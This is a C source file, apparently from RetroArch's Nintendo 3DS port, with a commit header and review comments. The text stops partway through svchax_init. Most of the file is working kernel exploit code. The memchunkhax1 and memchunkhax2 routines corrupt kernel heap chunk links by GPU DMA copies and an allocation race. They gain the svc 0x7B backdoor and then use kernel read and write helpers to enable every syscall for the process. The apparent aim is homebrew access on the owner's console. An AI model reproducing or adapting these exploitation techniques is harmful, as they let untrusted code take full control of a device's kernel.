RetroArch/ctr/ctr_svchax.c
Justin Weiss 9ae2514009 [3DS] Update to libctru 2.0
Set USE_CTRULIB_2=1 to build with libctru 2.0. When unset, this code
is compatible with the older toolchain.

Some 2.0 changes addressed rare problems in earlier versions:

- Save / restore stack pointer for init / exit
  Otherwise, it could be outside of the range we deallocate.
- Run aptMainLoop in the audio driver to react correctly to sleep events

Other changes for 2.0:

- Remove ninjhax1 -- requires outdated APIs that have been removed
- Switch from __sync_arbiter to syncArbitrateAddress
- Use implicit gxCmdBuf
- Use gpuPresentBuffer for double buffering
2020-08-26 19:08:12 -07:00

573 lines
16 KiB
C

#include <3ds.h>
#include <stdio.h>
#include <string.h>
#include <malloc.h>
/* Fixed addresses that the kernel-mode helpers in this file dereference to
 * reach the current thread / process objects. */
#define CURRENT_KTHREAD 0xFFFF9000
#define CURRENT_KPROCESS 0xFFFF9004
/* Handle value passed to svcGetResourceLimit() to refer to the calling process. */
#define CURRENT_KPROCESS_HANDLE 0xFFFF8001
/* Resource-limit name used when querying the thread count / thread limit. */
#define RESOURCE_LIMIT_THREADS 0x2
/* Number of thread slots tracked by memchunkhax2. */
#define MCH2_THREAD_COUNT_MAX 0x20
/* Total stack bytes shared (in equal slices) by all memchunkhax2 threads. */
#define MCH2_THREAD_STACKS_SIZE 0x1000
/* Byte offset, inside an SVC access-control bitmap, of the 32-bit word that
 * holds the bit for svc_id. */
#define SVC_ACL_OFFSET(svc_id) (((svc_id) >> 5) << 2)
/* Bit for svc_id inside that word. The constant is unsigned so that ids whose
 * low five bits are 31 do not shift into the sign bit (undefined behaviour
 * for a signed int). */
#define SVC_ACL_MASK(svc_id) (0x1u << ((svc_id) & 0x1F))
/* Byte offset of the SVC access-control bitmap inside a thread page. */
#define THREAD_PAGE_ACL_OFFSET 0xF38
/* Set to 1 by svchax_init() once all SVCs have been enabled. */
u32 __ctr_svchax = 0;
/* Set to 1 by svchax_init() once srv has been re-initialised with the
 * process ID temporarily forced to 0. */
u32 __ctr_svchax_srv = 0;
/* Defined elsewhere; svchax_init() only runs an exploit when this is non-NULL. */
extern void* __service_ptr;
/* Signature of a routine executed through svc_7b(); takes up to two arguments. */
typedef u32(*backdoor_fn)(u32 arg0, u32 arg1);
/* Arguments handed to target_thread_entry(). */
typedef struct
{
/* Event the thread signals as soon as it starts running. */
Handle started_event;
/* Event the thread blocks on until the main thread releases it. */
Handle lock;
/* If non-zero once the thread is released, kernel address it writes
 * target_val to through write_kaddr(). */
volatile u32 target_kaddr;
/* Value written to target_kaddr. */
volatile u32 target_val;
} mch2_thread_args_t;
/* Per-slot bookkeeping for the threads created by do_memchunkhax2(). */
typedef struct
{
/* Stack top passed to svcCreateThread() for this slot. */
u32* stack_top;
/* Handle of the thread currently occupying the slot (0 once closed). */
Handle handle;
/* Written by check_tls_thread_entry(): true when that thread's TLS address
 * is 4 KiB aligned. Slots with keep set are skipped by the later stages. */
bool keep;
/* Arguments used when the slot runs target_thread_entry(). */
mch2_thread_args_t args;
} mch2_thread_t;
/* Working state of do_memchunkhax2(). */
typedef struct
{
/* CPU time limit read at the start and restored at the end. */
u32 old_cpu_time_limit;
/* Result of APT_CheckNew3DS(). */
bool isNew3DS;
/* Added to a physical FCRAM address to obtain its kernel virtual address. */
u32 kernel_fcram_mapping_offset;
#ifndef USE_CTRULIB_2
/* Address arbiter handle used with svcArbitrateAddress() (pre-2.0 libctru). */
Handle arbiter;
#endif
/* Address and size of the region alloc_thread_entry() allocates. */
volatile u32 alloc_address;
volatile u32 alloc_size;
/* Points at the static flush buffer; only assigned in the visible code. */
u8* flush_buffer;
/* Event that releases the dummy threads. */
Handle dummy_threads_lock;
/* Event that releases the target threads. */
Handle target_threads_lock;
/* Event a target thread signals to tell the main thread it has started. */
Handle main_thread_lock;
/* Not referenced by the visible code. */
u32* thread_page_va;
/* Kernel address stored into the second word of the record that is
 * GPU-copied over dst_memchunk. */
u32 thread_page_kva;
/* Number of thread slots actually used (see get_threads_limit()). */
u32 threads_limit;
/* Handle of the thread running alloc_thread_entry(). */
Handle alloc_thread;
/* Not referenced by the visible code. */
Handle poll_thread;
mch2_thread_t threads[MCH2_THREAD_COUNT_MAX];
} mch2_vars_t;
/*
 * Runs entry_fn through "svc 0x7B" and returns whatever entry_fn returned.
 *
 * Caller side (before the svc):
 *  - r0 (entry_fn), r1 and r2 (its two arguments) are pushed on the stack and
 *    r3 is set to point at them.
 *  - r0 is loaded with pc + 12. With ARM (not Thumb) encoding, where pc reads
 *    as the current instruction + 8, this is the address of the "cpsid aif"
 *    trampoline below.
 *
 * Trampoline (the code whose address was passed in r0):
 *  - masks interrupts/aborts (cpsid aif),
 *  - reloads entry_fn and its two arguments from the block r3 points to,
 *  - calls entry_fn, then stores its r0 result into the last pushed slot.
 *
 * Caller side (after the svc): the first two pushed words are discarded and
 * the third, now holding the result, is popped into r0.
 *
 * NOTE(review): svc 0x7B is presumably the kernel "backdoor" call that runs
 * the routine passed in r0 in privileged mode - confirm against the SVC table.
 * The asm returns with "bx lr", so the trailing "return 0;" is never reached
 * by the asm path.
 */
__attribute((naked))
static u32 svc_7b(backdoor_fn entry_fn, ...) /* can pass up to two arguments to entry_fn(...) */
{
__asm__ volatile(
"push {r0, r1, r2} \n\t"
"mov r3, sp \n\t"
"add r0, pc, #12 \n\t"
"svc 0x7B \n\t"
"add sp, sp, #8 \n\t"
"ldr r0, [sp], #4 \n\t"
"bx lr \n\t"
"cpsid aif \n\t"
"ldr r2, [r3], #4 \n\t"
"ldmfd r3!, {r0, r1} \n\t"
"push {r3, lr} \n\t"
"blx r2 \n\t"
"pop {r3, lr} \n\t"
"str r0, [r3, #-4]! \n\t"
"bx lr \n\t");
return 0;
}
/*
 * Kernel-mode routine (run through svc_7b): fills the 16-byte SVC
 * access-control bitmaps of the current thread and the current process
 * with 0xFF, i.e. sets every bit.
 *
 * isNew3DS selects the word offset of the bitmap inside the process object
 * (0x24 words on New3DS, 0x22 otherwise).
 */
static void k_enable_all_svcs(u32 isNew3DS)
{
   u32 **kthread       = *(u32***)CURRENT_KTHREAD;
   u32  *kprocess      = *(u32**)CURRENT_KPROCESS;
   /* Pointer stored at word 0x22 of the thread object, moved back 6 words. */
   u32  *thread_bitmap = kthread[0x22] - 0x6;
   u32  *proc_bitmap;

   if (isNew3DS)
      proc_bitmap = kprocess + 0x24;
   else
      proc_bitmap = kprocess + 0x22;

   memset(thread_bitmap, 0xFF, 0x10);
   memset(proc_bitmap, 0xFF, 0x10);
}
/* Kernel-mode routine (run through svc_7b): returns the word stored at kaddr. */
static u32 k_read_kaddr(u32* kaddr)
{
   u32 word = kaddr[0];

   return word;
}
/* Reads one 32-bit word from kernel address kaddr by running k_read_kaddr()
 * through svc_7b(). */
static u32 read_kaddr(u32 kaddr)
{
   backdoor_fn reader = (backdoor_fn)k_read_kaddr;

   return svc_7b(reader, kaddr);
}
/* Kernel-mode routine (run through svc_7b): stores val at kaddr.
 * Always returns 0. */
static u32 k_write_kaddr(u32* kaddr, u32 val)
{
   kaddr[0] = val;

   return 0;
}
/* Writes val to kernel address kaddr by running k_write_kaddr() through
 * svc_7b(). The helper's return value is discarded. */
static void write_kaddr(u32 kaddr, u32 val)
{
   backdoor_fn writer = (backdoor_fn)k_write_kaddr;

   (void)svc_7b(writer, kaddr, val);
}
/*
 * Issues "svc 0x2A" with r0 = sp - 8, r1 = 1, r2 = 0 and returns the value
 * left in r1 by the call, rounded down to a 4 KiB boundary.
 *
 * Callers add THREAD_PAGE_ACL_OFFSET to the result and treat it as the
 * kernel address of the calling thread's page.
 *
 * NOTE(review): this relies on what the kernel leaves in r1 after svc 0x2A;
 * that behaviour is not visible in this file - confirm before changing.
 * The asm returns with "bx lr", so the trailing "return 0;" is never reached
 * by the asm path.
 */
__attribute__((naked))
static u32 get_thread_page(void)
{
__asm__ volatile(
"sub r0, sp, #8 \n\t"
"mov r1, #1 \n\t"
"mov r2, #0 \n\t"
"svc 0x2A \n\t"
"mov r0, r1, LSR#12 \n\t"
"mov r0, r0, LSL#12 \n\t"
"bx lr \n\t");
return 0;
}
/*
 * Thread entry point: allocates mch2->alloc_size bytes of read/write memory
 * at mch2->alloc_address with svcControlMemory(MEMOP_ALLOC), then exits.
 * The result of the allocation is not checked.
 */
static void alloc_thread_entry(mch2_vars_t* mch2)
{
   u32 mapped_addr;
   u32 wanted_addr = mch2->alloc_address;
   u32 wanted_size = mch2->alloc_size;

   svcControlMemory(&mapped_addr, wanted_addr, 0x0, wanted_size,
         MEMOP_ALLOC, MEMPERM_READ | MEMPERM_WRITE);

   svcExitThread();
}
/*
 * Thread entry point: blocks (without timeout) until `lock` is signalled,
 * then exits. The wait result is ignored.
 */
static void dummy_thread_entry(Handle lock)
{
   (void)svcWaitSynchronization(lock, U64_MAX);

   svcExitThread();
}
static void check_tls_thread_entry(bool* keep)
{
*keep = !((u32)getThreadLocalStorage() & 0xFFF);
svcExitThread();
}
/*
 * Thread entry point used for the "target" threads:
 *  1. signals args->started_event so the creator knows the thread is running,
 *  2. blocks until args->lock is signalled,
 *  3. if a target address was set in the meantime, writes args->target_val to
 *     that kernel address,
 *  4. exits.
 */
static void target_thread_entry(mch2_thread_args_t* args)
{
   svcSignalEvent(args->started_event);
   svcWaitSynchronization(args->lock, U64_MAX);

   if (args->target_kaddr != 0)
   {
      write_kaddr(args->target_kaddr, args->target_val);
   }

   svcExitThread();
}
/*
 * Computes the kernel virtual address of the first free page of the BASE
 * memory region.
 *
 * The result is: (kernel FCRAM mapping base) + (FCRAM size)
 *                - (BASE memory used by non-linear allocations) - 0x1000.
 * The linear part of the BASE usage is an estimate ("guessed" in the original
 * code): 0x6C000 plus the value reported by svcGetSystemInfo(type 2, param 0),
 * plus one extra page (two on New3DS) on kernels newer than 2.49.0.
 */
static u32 get_first_free_basemem_page(bool isNew3DS)
{
   s64 sysinfo_value;
   int base_used_linear; /* guessed */
   int base_used = osGetMemRegionUsed(MEMREGION_BASE);
   int kernel_extra = 0x0;
   u32 kver;
   u32 fcram_kernel_base;
   u32 fcram_size;

   svcGetSystemInfo(&sysinfo_value, 2, 0);

   kver = osGetKernelVersion();
   if (kver > SYSTEM_VERSION(2, 49, 0))
      kernel_extra = isNew3DS ? 0x2000 : 0x1000;

   base_used_linear = 0x6C000 + sysinfo_value + kernel_extra;

   /* kernel FCRAM mapping */
   if (kver > SYSTEM_VERSION(2, 40, 0))
      fcram_kernel_base = 0xE0000000;
   else
      fcram_kernel_base = 0xF0000000;

   /* FCRAM size */
   fcram_size = isNew3DS ? 0x10000000 : 0x08000000;

   return fcram_kernel_base
      + fcram_size
      - (base_used - base_used_linear) /* memory usage for pages allocated without the MEMOP_LINEAR flag */
      - 0x1000;                        /* skip to the start addr of the next free page */
}
static u32 get_threads_limit(void)
{
Handle resource_limit_handle;
s64 thread_limit_current;
s64 thread_limit_max;
u32 thread_limit_name = RESOURCE_LIMIT_THREADS;
svcGetResourceLimit(&resource_limit_handle, CURRENT_KPROCESS_HANDLE);
svcGetResourceLimitCurrentValues(&thread_limit_current, resource_limit_handle, &thread_limit_name, 1);
svcGetResourceLimitLimitValues(&thread_limit_max, resource_limit_handle, &thread_limit_name, 1);
svcCloseHandle(resource_limit_handle);
if (thread_limit_max > MCH2_THREAD_COUNT_MAX)
thread_limit_max = MCH2_THREAD_COUNT_MAX;
return thread_limit_max - thread_limit_current;
}
/*
 * memchunkhax2: sets the svc 0x7B bit in the calling thread's SVC
 * access-control bitmap (used by svchax_init() on kernels newer than 2.46.0
 * and up to 2.50.11).
 *
 * Outline of what the code below does:
 *  1. Probe which thread slots get a page-aligned TLS ("keep") and recycle the
 *     others through short-lived dummy threads.
 *  2. Shape the heap: a linear block with every other page freed, plus a
 *     regular allocation that consumes the rest of the free application memory.
 *  3. Start a thread that allocates [alloc_address, alloc_address + alloc_size)
 *     and, while that allocation is in progress, GPU-copy a 3-word record over
 *     dst_memchunk inside the linear block.
 *  4. Create target threads until one of them shows up in the last page of
 *     the new allocation; patch its SVC bitmap through that mapping and have it
 *     patch the main thread's bitmap with write_kaddr().
 *  5. Undo the allocations and restore the CPU time limit.
 *
 * The sequence is timing- and order-sensitive; no SVC result is checked.
 */
static void do_memchunkhax2(void)
{
/* The upper half of flush_buffer is repeatedly memcpy'd onto the lower half
 * around the GPU operations. NOTE(review): presumably to churn the CPU data
 * cache - confirm. */
static u8 flush_buffer[0x8000];
/* One shared buffer, sliced into MCH2_THREAD_COUNT_MAX equal stacks below. */
static u8 thread_stacks[MCH2_THREAD_STACKS_SIZE];
extern u32 __heapBase;
extern u32 __heap_size;
int i;
u32 tmp;
u32 linear_buffer;
u32 linear_address;
u32 dst_memchunk;
u32 mem_free;
u32 fragmented_size;
u32* mapped_page;
volatile u32 *thread_ACL;
u32 alloc_address_kaddr;
u32 fragmented_address = 0;
u32 linear_size = 0xF000;
u32 skip_pages = 2;
mch2_vars_t mch2 = {0};
mch2.flush_buffer = flush_buffer;
mch2.threads_limit = get_threads_limit();
mch2.kernel_fcram_mapping_offset = (osGetKernelVersion() > SYSTEM_VERSION(2, 40, 0)) ? 0xC0000000 : 0xD0000000;
/* Slot i gets the i-th slice of thread_stacks; stack_top is the slice's end. */
for (i = 0; i < MCH2_THREAD_COUNT_MAX; i++)
mch2.threads[i].stack_top = (u32*)((u32)thread_stacks + (i + 1) * (MCH2_THREAD_STACKS_SIZE / MCH2_THREAD_COUNT_MAX));
APT_CheckNew3DS(&mch2.isNew3DS);
/* Remember the CPU time limit (restored at the end) and set it to 5. */
APT_GetAppCpuTimeLimit(&mch2.old_cpu_time_limit);
APT_SetAppCpuTimeLimit(5);
/* Stage 1a: run one probe thread per slot to completion; each records in
 * .keep whether its TLS address was page aligned. */
for (i = 0; i < mch2.threads_limit; i++)
{
svcCreateThread(&mch2.threads[i].handle,
(ThreadFunc)check_tls_thread_entry,
(u32)&mch2.threads[i].keep,
mch2.threads[i].stack_top, 0x18, 0);
svcWaitSynchronization(mch2.threads[i].handle, U64_MAX);
}
/* Close only the non-kept probes; kept slots hold their handle until the
 * final cleanup loop. */
for (i = 0; i < mch2.threads_limit; i++)
if (!mch2.threads[i].keep)
svcCloseHandle(mch2.threads[i].handle);
/* Stage 1b: refill the non-kept slots with dummy threads (priority value
 * 0x3F - i) that block on one event, release them all, then reap them in
 * reverse slot order. */
svcCreateEvent(&mch2.dummy_threads_lock, 1);
svcClearEvent(mch2.dummy_threads_lock);
for (i = 0; i < mch2.threads_limit; i++)
if (!mch2.threads[i].keep)
svcCreateThread(&mch2.threads[i].handle,
(ThreadFunc)dummy_thread_entry,
mch2.dummy_threads_lock,
mch2.threads[i].stack_top, 0x3F - i, 0);
svcSignalEvent(mch2.dummy_threads_lock);
for (i = mch2.threads_limit - 1; i >= 0; i--)
{
if (!mch2.threads[i].keep)
{
svcWaitSynchronization(mch2.threads[i].handle, U64_MAX);
svcCloseHandle(mch2.threads[i].handle);
mch2.threads[i].handle = 0;
}
}
svcCloseHandle(mch2.dummy_threads_lock);
#ifndef USE_CTRULIB_2
mch2.arbiter = __sync_get_arbiter();
#endif
/* Stage 2: one linear page that will hold the record to be GPU-copied. */
svcControlMemory(&linear_buffer, 0, 0, 0x1000,
MEMOP_ALLOC_LINEAR, MEMPERM_READ | MEMPERM_WRITE);
/* With linear_size = 0xF000 and skip_pages = 2 this evaluates to 0x7000. */
mch2.alloc_size = ((((linear_size - (skip_pages << 12))
+ 0x1000) >> 13) << 12);
/* fragmented_size is what should remain free once linear_size more bytes
 * have been allocated; the fragmented region starts at the end of the heap
 * and alloc_address follows it directly. */
mem_free = osGetMemRegionFree(MEMREGION_APPLICATION);
fragmented_size = mem_free - linear_size;
fragmented_address = __heapBase + __heap_size;
mch2.alloc_address = fragmented_address + fragmented_size;
svcControlMemory(&linear_address,
0x0, 0x0, linear_size, MEMOP_ALLOC_LINEAR,
MEMPERM_READ | MEMPERM_WRITE);
if (fragmented_size)
svcControlMemory(&tmp,
(u32)fragmented_address, 0x0, fragmented_size, MEMOP_ALLOC,
MEMPERM_READ | MEMPERM_WRITE);
/* Free the first skip_pages pages of the linear block... */
if (skip_pages)
svcControlMemory(&tmp,
(u32)linear_address, 0x0, (skip_pages << 12), MEMOP_FREE,
MEMPERM_DONTCARE);
/* ...and then every second page after them, leaving isolated free pages. */
for (i = skip_pages; i < (linear_size >> 12) ; i += 2)
svcControlMemory(&tmp,
(u32)linear_address + (i << 12), 0x0, 0x1000,
MEMOP_FREE, MEMPERM_DONTCARE);
/* Kernel virtual address of the linear block. */
alloc_address_kaddr = osConvertVirtToPhys(
(void*)linear_address) + mch2.kernel_fcram_mapping_offset;
mch2.thread_page_kva = get_first_free_basemem_page(mch2.isNew3DS)
- 0x10000; /* skip down 16 pages */
/* Three-word record copied over dst_memchunk below.
 * NOTE(review): presumably a forged kernel heap chunk header whose second
 * word points at thread_page_kva - the header layout is not visible here. */
((u32*)linear_buffer)[0] = 1;
((u32*)linear_buffer)[1] = mch2.thread_page_kva;
((u32*)linear_buffer)[2] = alloc_address_kaddr + (((mch2.alloc_size >> 12) - 3) << 13) + (skip_pages << 12);
dst_memchunk = linear_address
+ (((mch2.alloc_size >> 12) - 2) << 13)
+ (skip_pages << 12);
memcpy(flush_buffer, flush_buffer + 0x4000, 0x4000);
GSPGPU_InvalidateDataCache((void*)dst_memchunk, 16);
GSPGPU_FlushDataCache((void*)linear_buffer, 16);
memcpy(flush_buffer, flush_buffer + 0x4000, 0x4000);
/* gspEvents[GSPGPU_EVENT_PPF] cannot be cleared directly, so execute a
 * dummy copy and use gspWaitForEvent to clear it. */
/* LightEvent_Clear(&gspEvents[GSPGPU_EVENT_PPF]); */
GX_TextureCopy((void*)linear_buffer, 0, (void*)dst_memchunk, 0, 16, 8);
gspWaitForEvent(GSPGPU_EVENT_PPF, false);
/* Stage 3: start the allocating thread (priority value 0x3F, last argument 1),
 * using the stack slice of the last slot. */
svcCreateThread(&mch2.alloc_thread,
(ThreadFunc)alloc_thread_entry, (u32)&mch2,
mch2.threads[MCH2_THREAD_COUNT_MAX - 1].stack_top, 0x3F, 1);
/* Spin for as long as arbitrating on alloc_address returns 0xD9001814.
 * NOTE(review): presumably that code means the address is not mapped yet,
 * so the loop ends once the allocation has begun mapping it - confirm. */
#ifdef USE_CTRULIB_2
while ((u32) syncArbitrateAddress((s32 *)mch2.alloc_address,
ARBITRATION_WAIT_IF_LESS_THAN_TIMEOUT, 0) == 0xD9001814);
#else
while ((u32) svcArbitrateAddress(mch2.arbiter, mch2.alloc_address,
ARBITRATION_WAIT_IF_LESS_THAN_TIMEOUT, 0,
0) == 0xD9001814);
#endif
/* Copy the record over dst_memchunk while the allocation is still running. */
GX_TextureCopy((void*)linear_buffer, 0, (void*)dst_memchunk, 0, 16, 8);
memcpy(flush_buffer, flush_buffer + 0x4000, 0x4000);
gspWaitForEvent(GSPGPU_EVENT_PPF, false);
svcWaitSynchronization(mch2.alloc_thread, U64_MAX);
svcCloseHandle(mch2.alloc_thread);
/* Stage 4: the last page of the new allocation is treated as a thread page;
 * thread_ACL points at the SVC bitmap inside it. */
mapped_page = (u32*)
(mch2.alloc_address + mch2.alloc_size - 0x1000);
thread_ACL = &mapped_page[THREAD_PAGE_ACL_OFFSET >> 2];
svcCreateEvent(&mch2.main_thread_lock, 0);
svcCreateEvent(&mch2.target_threads_lock, 1);
svcClearEvent(mch2.target_threads_lock);
for (i = 0; i < mch2.threads_limit; i++)
{
if (mch2.threads[i].keep)
continue;
mch2.threads[i].args.started_event = mch2.main_thread_lock;
mch2.threads[i].args.lock = mch2.target_threads_lock;
mch2.threads[i].args.target_kaddr = 0;
/* Zero the first bitmap word, then start a thread and see whether that
 * word becomes non-zero, i.e. whether the new thread landed in mapped_page. */
thread_ACL[0] = 0;
GSPGPU_FlushDataCache((void*)thread_ACL, 16);
GSPGPU_InvalidateDataCache((void*)thread_ACL, 16);
svcClearEvent(mch2.main_thread_lock);
svcCreateThread(&mch2.threads[i].handle,
(ThreadFunc)target_thread_entry,
(u32)&mch2.threads[i].args,
mch2.threads[i].stack_top, 0x18, 0);
svcWaitSynchronization(mch2.main_thread_lock, U64_MAX);
if (thread_ACL[0])
{
/* Found it: set the svc 0x7B bit in that thread's bitmap through the
 * mapping, and tell the thread to write the same bit into the bitmap of
 * the thread running this function (get_thread_page() is called here). */
thread_ACL[SVC_ACL_OFFSET(0x7B) >> 2] = SVC_ACL_MASK(0x7B);
GSPGPU_FlushDataCache((void*)thread_ACL, 16);
GSPGPU_InvalidateDataCache((void*)thread_ACL, 16);
mch2.threads[i].args.target_kaddr = get_thread_page()
+ THREAD_PAGE_ACL_OFFSET
+ SVC_ACL_OFFSET(0x7B);
mch2.threads[i].args.target_val = SVC_ACL_MASK(0x7B);
break;
}
}
/* Release every target thread, wait for the non-kept ones and close all
 * remaining handles (kept slots still hold their probe-thread handle). */
svcSignalEvent(mch2.target_threads_lock);
for (i = 0; i < mch2.threads_limit; i++)
{
if (!mch2.threads[i].handle)
continue;
if (!mch2.threads[i].keep)
svcWaitSynchronization(mch2.threads[i].handle, U64_MAX);
svcCloseHandle(mch2.threads[i].handle);
}
svcCloseHandle(mch2.target_threads_lock);
svcCloseHandle(mch2.main_thread_lock);
/* Stage 5: release everything. The write_kaddr() call uses the svc 0x7B
 * access gained above. NOTE(review): presumably it repairs the heap chunk
 * link that was overwritten - confirm. */
svcControlMemory(&tmp, mch2.alloc_address, 0, mch2.alloc_size,
MEMOP_FREE, MEMPERM_DONTCARE);
write_kaddr(alloc_address_kaddr + linear_size - 0x3000 + 0x4, alloc_address_kaddr + linear_size - 0x1000);
svcControlMemory(&tmp, (u32)fragmented_address, 0x0, fragmented_size,
MEMOP_FREE, MEMPERM_DONTCARE);
/* Free the pages of the linear block that were left allocated in stage 2. */
for (i = 1 + skip_pages; i < (linear_size >> 12) ; i += 2)
svcControlMemory(&tmp, (u32)linear_address + (i << 12), 0x0, 0x1000,
MEMOP_FREE, MEMPERM_DONTCARE);
svcControlMemory(&tmp, linear_buffer, 0, 0x1000, MEMOP_FREE,
MEMPERM_DONTCARE);
APT_SetAppCpuTimeLimit(mch2.old_cpu_time_limit);
}
/*
 * Copies `size` bytes from `src` to `dst` with the GPU (GX_TextureCopy) and
 * waits for the PPF event that follows.
 *
 * dst          destination address (its CPU data cache range is invalidated)
 * src          source address (its CPU data cache range is flushed first)
 * size         number of bytes to copy
 * flush_buffer scratch buffer of at least 0x8000 bytes; its upper 0x4000
 *              bytes are memcpy'd onto its lower 0x4000 bytes before and
 *              after the copy. NOTE(review): presumably to churn the CPU data
 *              cache - confirm.
 *
 * The unused block-scope "extern Handle gspEvents[]" declaration was dropped:
 * nothing here referenced it, and the comment in do_memchunkhax2() says the
 * array cannot be accessed directly.
 *
 * NOTE(review): unlike do_memchunkhax2(), no dummy copy is issued first to
 * clear a PPF event that might already be pending - confirm this is fine.
 */
static void gspwn(u32 dst, u32 src, u32 size, u8* flush_buffer)
{
   memcpy(flush_buffer, flush_buffer + 0x4000, 0x4000);
   GSPGPU_InvalidateDataCache((void*)dst, size);
   GSPGPU_FlushDataCache((void*)src, size);
   memcpy(flush_buffer, flush_buffer + 0x4000, 0x4000);

   GX_TextureCopy((void*)src, 0, (void*)dst, 0, size, 8);
   gspWaitForEvent(GSPGPU_EVENT_PPF, false);

   memcpy(flush_buffer, flush_buffer + 0x4000, 0x4000);
}
/* Pseudo-code for the net effect of memchunkhax1_write_pair(val1, val2):
* if(val2)
* {
* *(u32*)val1 = val2;
* *(u32*)(val2 + 8) = (val1 - 4);
* }
* else
* *(u32*)val1 = 0x0;
*/
/* X-X--X-X
* X-XXXX-X
*/
/*
 * memchunkhax1 primitive. Works on a 16-page (0x10000 byte) linear block,
 * referred to below by page offset:
 *
 *  - pages 1, 3-4 and 6 are freed, pages 0, 2 and 5 stay allocated;
 *  - the first 16 bytes of each freed run are GPU-copied into the allocated
 *    page just before it, so the CPU can read them;
 *  - the words at +4 / +8 of those copies are used as "next" / "prev" links:
 *    run 1's next and run 6's prev are pointed past run 3, and run 3's own
 *    links are replaced with val2 / (val1 - 4);
 *  - the edited 16 bytes are GPU-copied back into the freed pages, with a
 *    0x2000-byte linear allocation issued right after run 3 is written back;
 *  - finally every page still allocated in the block is freed.
 *
 * NOTE(review): the intended result is presumably that the kernel follows
 * the edited links during the 0x2000 allocation - confirm before changing
 * the order of any statement here. No SVC result is checked.
 */
static void memchunkhax1_write_pair(u32 val1, u32 val2)
{
u32 linear_buffer;
u8* flush_buffer;
u32 tmp;
u32* next_ptr3;
u32* prev_ptr3;
u32* next_ptr1;
u32* prev_ptr6;
svcControlMemory(&linear_buffer, 0, 0, 0x10000,
MEMOP_ALLOC_LINEAR, MEMPERM_READ | MEMPERM_WRITE);
/* The second half of the block doubles as gspwn()'s scratch buffer. */
flush_buffer = (u8*)(linear_buffer + 0x8000);
/* Free page 1, pages 3-4 and page 6. */
svcControlMemory(&tmp, linear_buffer + 0x1000, 0, 0x1000, MEMOP_FREE, 0);
svcControlMemory(&tmp, linear_buffer + 0x3000, 0, 0x2000, MEMOP_FREE, 0);
svcControlMemory(&tmp, linear_buffer + 0x6000, 0, 0x1000, MEMOP_FREE, 0);
/* Copy the first 16 bytes of each freed run into the allocated page before it. */
next_ptr1 = (u32*)(linear_buffer + 0x0004);
gspwn(linear_buffer + 0x0000, linear_buffer + 0x1000, 16, flush_buffer);
next_ptr3 = (u32*)(linear_buffer + 0x2004);
prev_ptr3 = (u32*)(linear_buffer + 0x2008);
gspwn(linear_buffer + 0x2000, linear_buffer + 0x3000, 16, flush_buffer);
prev_ptr6 = (u32*)(linear_buffer + 0x5008);
gspwn(linear_buffer + 0x5000, linear_buffer + 0x6000, 16, flush_buffer);
/* Bypass run 3 in its neighbours' links, then plant the caller's values in
 * run 3's own links. */
*next_ptr1 = *next_ptr3;
*prev_ptr6 = *prev_ptr3;
*prev_ptr3 = val1 - 4;
*next_ptr3 = val2;
/* Write run 3's edited 16 bytes back, then allocate 0x2000 linear bytes. */
gspwn(linear_buffer + 0x3000, linear_buffer + 0x2000, 16, flush_buffer);
svcControlMemory(&tmp, 0, 0, 0x2000,
MEMOP_ALLOC_LINEAR, MEMPERM_READ | MEMPERM_WRITE);
/* Write back the edited copies for runs 1 and 6. */
gspwn(linear_buffer + 0x1000, linear_buffer + 0x0000, 16, flush_buffer);
gspwn(linear_buffer + 0x6000, linear_buffer + 0x5000, 16, flush_buffer);
/* Free page 0, pages 2-5 and pages 7-15. */
svcControlMemory(&tmp, linear_buffer + 0x0000, 0, 0x1000, MEMOP_FREE, 0);
svcControlMemory(&tmp, linear_buffer + 0x2000, 0, 0x4000, MEMOP_FREE, 0);
svcControlMemory(&tmp, linear_buffer + 0x7000, 0, 0x9000, MEMOP_FREE, 0);
}
/*
 * memchunkhax1: uses memchunkhax1_write_pair() to store 0x1F000000 into the
 * word of the calling thread's SVC bitmap that holds the svc 0x7B bit.
 *
 * The write pair also stores a value at 0x1F000008, so the word found there
 * beforehand is saved and then put back with write_kaddr().
 */
static void do_memchunkhax1(void)
{
   u32 acl_word_kaddr;
   u32 vram_backup = *(u32*)0x1F000008;

   acl_word_kaddr = get_thread_page()
      + THREAD_PAGE_ACL_OFFSET
      + SVC_ACL_OFFSET(0x7B);

   /* 0x1F000000 contains the enable bit for svc 0x7B */
   memchunkhax1_write_pair(acl_word_kaddr, 0x1F000000);

   write_kaddr(0x1F000008, vram_backup);
}
/*
 * Queries svcGetSystemInfo(type 0x10000, param 0) and splits the low 32 bits
 * of the result into a major and a minor version number.
 *
 * major, minor  outputs; written only on success.
 * Returns 0 on success, -1 when the query fails.
 *
 * NOTE(review): type 0x10000 is presumably a Luma3DS-specific extension, so
 * a failure would mean Luma3DS is not running - confirm.
 */
Result get_luma_version(u32 *major, u32 *minor)
{
   s64 raw_info;
   u32 packed;
   Result rc = svcGetSystemInfo(&raw_info, 0x10000, 0);

   if (R_FAILED(rc))
      return -1;

   packed = (u32)raw_info;
   *major = GET_VERSION_MAJOR(packed);
   *minor = GET_VERSION_MINOR(packed);

   return 0;
}
/*
 * Enables every SVC for the current thread and process and, optionally,
 * re-initialises srv while the process ID is temporarily forced to 0.
 *
 * patch_srv  when true (and not done before), srvExit()/srvInit() are called
 *            with the PID field of the process object set to 0, after which
 *            the original PID is restored.
 *
 * When __service_ptr is set, access to svc 0x7B is obtained first:
 *   - kernel >  2.50.11            : nothing is run; Luma major version >= 8
 *                                    is required, otherwise -1 is returned;
 *   - 2.46.0 < kernel <= 2.50.11   : do_memchunkhax2();
 *   - kernel <= 2.46.0             : do_memchunkhax1().
 *
 * Returns 0 on success, -1 when the kernel is too new and the Luma check
 * fails. Both stages run at most once (see __ctr_svchax, __ctr_svchax_srv).
 *
 * Fix: the Luma check used to read
 *   R_FAILED(get_luma_version(...) || luma_major < 8)
 * which applies R_FAILED() to a 0/1 boolean and can therefore never be true;
 * the function then went on to issue svc 0x7B without any check.
 */
Result svchax_init(bool patch_srv)
{
   bool isNew3DS = false;
   u32 kver;

   APT_CheckNew3DS(&isNew3DS);
   kver = osGetKernelVersion();

   if (!__ctr_svchax)
   {
      if (__service_ptr)
      {
         if (kver > SYSTEM_VERSION(2, 50, 11))
         {
            u32 luma_major = 0;
            u32 luma_minor = 0;

            /* luma_major is only inspected when the query succeeded. */
            if (R_FAILED(get_luma_version(&luma_major, &luma_minor))
                  || luma_major < 8)
               return -1;
         }
         else if (kver > SYSTEM_VERSION(2, 46, 0))
            do_memchunkhax2();
         else
            do_memchunkhax1();
      }

      svc_7b((backdoor_fn)k_enable_all_svcs, isNew3DS);
      __ctr_svchax = 1;
   }

   if (patch_srv && !__ctr_svchax_srv)
   {
